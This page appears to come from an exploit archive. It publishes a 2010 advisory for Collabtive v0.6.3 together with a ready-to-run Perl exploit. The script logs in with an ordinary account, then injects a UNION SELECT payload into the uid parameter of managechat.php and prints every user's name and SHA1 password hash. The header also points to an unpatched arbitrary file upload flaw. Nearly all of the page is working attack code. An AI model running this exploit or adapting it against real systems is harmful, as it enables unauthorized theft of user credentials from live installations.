Home / os / win7

Collabtive v0.6.3 Multiple Vulnerabilities

Posted on 12 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Collabtive v0.6.3 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==========================================
Collabtive v0.6.3 Multiple Vulnerabilities 
==========================================


#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;
use Getopt::Long;
 
#                           #'#/
#                           (-.-)
#    ------------------oOO---(_)---OOo-----------------
#    |          __             __                     |
#    |    _____/ /_____ ______/ /_  __  ______ ______ |
#    |   / ___/ __/ __ `/ ___/ __ / / / / __ `/ ___/ |
#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
#    | Security Research Division      /____/ 2o1o    |
#    --------------------------------------------------
#    |   Collabtive v0.6.3 Multiple Vulnerabilities   |
#    --------------------------------------------------
# [!] Discovered by.: DNX
# [!] Homepage......: http://starbugs.host.sk
# [!] Vendor........: http://collabtive.o-dyn.de
# [!] Detected......: 04.06.2010
# [!] Reported......: 05.06.2010
# [!] Response......: xx.xx.2010
#
# [!] Background....: Collabtive ist eine web-basierte Projektmanagementsoftware.
#                     Das Projekt startete im November 2007. Es ist eine
#                     Open-Source-Software und stellt eine Alternative zu propriet?ren
#                     Werkzeugen wie Basecamp dar. Collabtive ist in PHP geschrieben.
#
#                     Collabtive wird von einem professionellen Team entwickelt.
#
# [!] Requirements..: Account needed
#
# [!] Bug...........: $_GET['uid'] in managechat.php near line 64
#
#                     12: $userto_id = getArrayVal($_GET, &quot;uid&quot;);
#
#                     64: $sel = mysql_query(&quot;SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time &gt; $start ORDER by time ASC&quot;);
#
#                     The password is encoded with sha1.
#
# [!] Bug...........: The arbitrary file upload discovered by USH is still present.
#                     See http://www.milw0rm.com/exploits/7076 more details.
#
 
if(!$ARGV[5])
{
  print &quot;
                       \#'#/                   &quot;;
  print &quot;
                       (-.-)                    &quot;;
  print &quot;
   ---------------oOO---(_)---OOo---------------&quot;;
  print &quot;
   |  Collabtive v0.6.3 SQL Injection Exploit  |&quot;;
  print &quot;
   |               coded by DNX                |&quot;;
  print &quot;
   ---------------------------------------------&quot;;
  print &quot;
[!] Usage: perl collabtive.pl [Host] [Path] &lt;Options&gt;&quot;;
  print &quot;
[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345&quot;;
  print &quot;
[!] Options:&quot;;
  print &quot;
       -user [text]    Username&quot;;
  print &quot;
       -pass [text]    Password&quot;;
  print &quot;
       -p [ip:port]    Proxy support&quot;;
  print &quot;
&quot;;
  exit;
}
 
my %options = ();
GetOptions(\%options, &quot;user=s&quot;, &quot;pass=s&quot;, &quot;p=s&quot;);
my $ua      = LWP::UserAgent-&gt;new();
my $cookie  = HTTP::Cookies-&gt;new();
my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $target  = &quot;http://&quot;.$host.$path;
my $user    = &quot;&quot;;
my $pass    = &quot;&quot;;
 
if($options{&quot;p&quot;}) { $ua-&gt;proxy('http', &quot;http://&quot;.$options{&quot;p&quot;}); }
if($options{&quot;user&quot;}) { $user = $options{&quot;user&quot;}; }
if($options{&quot;pass&quot;}) { $pass = $options{&quot;pass&quot;}; }
 
print &quot;[!] Exploiting...

&quot;;
 
exploit();
 
print &quot;
[!] Done
&quot;;
 
sub exploit
{
  ##############
  # make login #
  ##############
   
  my $url = $target.&quot;manageuser.php?action=login&quot;;
  my $res = $ua-&gt;post($url, [username =&gt; $user, pass =&gt; $pass]);
  $cookie-&gt;extract_cookies($res);
  $ua-&gt;cookie_jar($cookie);
   
  ############################
  # get users with passwords #
  ############################
   
  $url = $target.&quot;managechat.php?action=pull&amp;uid=0) union select 1,2,name,4,5,6,pass from user/*&quot;;
  $res = $ua-&gt;get($url);
  my $content = $res-&gt;content;
   
  my @c = split(/&lt;br /&gt;/, $content);
  foreach (@c)
  {
    if($_ =~ /&lt;b&gt;(.*?):&lt;/b&gt; (.*)/)
    {
      print $1.&quot;:&quot;.$2.&quot;
&quot;;
    }
  }
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-12]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :